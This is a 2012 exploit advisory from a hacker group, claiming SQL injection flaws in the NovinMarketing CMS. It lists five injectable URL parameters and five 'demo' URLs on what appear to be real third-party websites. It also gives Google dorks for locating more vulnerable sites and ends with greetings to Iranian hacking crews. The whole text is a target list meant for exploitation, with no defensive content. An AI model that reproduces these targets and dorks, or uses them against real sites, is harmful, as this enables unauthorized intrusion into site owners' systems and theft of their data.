************************************************************************************************** | @@@@@@@@ @@@@@@@@@ @@ @@ @@@@@ @@ @@ @@@@@@@@ | | @ @ @ @ @ @ @ @ @ @ @ @ @ | | @ @ @ @ @ @ @ @ @ @ @ @ @ | | @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ | | @@@@@@@@ @@@ @@@ @ @ @ @ @ @ @ @ @ @@@@@@@@ | | @ @ @ @ @ @ @ @ @ @ @ @ @ | | @ @ @ @ @ @ @ @ @ @ @ @ @ | | @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ | | @@@@@@@@ @ @ @ @ @ @@@@@ @ @ @ @@@ @@@@@@@@ | ************************************************************************************************** ================================================================================================== # [~] Exploit Title: NovinMarketing SQL Injection Bugs # # [~] Google Dorks : " Bottom Of The Exploits " # # [~] Date: 10/09/2012 (Mo) # # [~] Exploit Author: Samim.s # # [~] Version: ALL Versions # # [~] Tested on: Se7en & BT5 # # [~] Support WebSite : NovinMarketing.com # ================================================================================================== # [+] SQLi Exploits : # # http://WebSite.Com/[path]/ShowCourseAnnouncement.aspx?announceid=[SQLi] # # http://WebSite.Com/[path]/AdsShow.aspx?adsid=[SQLi] # # http://WebSite.Com/[path]/ProductShow.aspx?prodid=[SQLi] # # http://WebSite.Com/[path]/ShowAnnouncement.aspx?announceid=[SQLi] # # http://WebSite.Com/[path]/ShowNews.aspx?newsid=[SQLi] # # ---------------------------------------------------------------------------------------------- # # [+] Demos : # # http://www.iedep.com/CMS_UI/ShowCourseAnnouncement.aspx?announceid=6 # # http://peykedideno.com/FA/AdsShow.aspx?adsid=244 # # http://www.bazarhotel.com/HotelProducts/CMS_UI/ProductShow.aspx?prodid=17 # # http://jppars.com/CMS_UI/ShowAnnouncement.aspx?announceid=10 # # http://www.tt-bita.com/CMS_UI/ShowNews.aspx?newsid=1026 # # ---------------------------------------------------------------------------------------------- # # [+] Dorks : # # inurl:"ShowCourseAnnouncement.aspx?announceid=" # # inurl:"AdsShow.aspx?adsid=[" # # inurl:"ProductShow.aspx?prodid=" # # inurl:"ShowAnnouncement.aspx?announceid=" # # inurl:"ShowNews.aspx?newsid=" # ================================================================================================== # [*] GreetZ To: Mr.XpR - UnknowN - Mr.EBI - SaMaN.BiLiZ & All IRaNHaCK Member + Iranian HaCkerZ # ==================================================================================================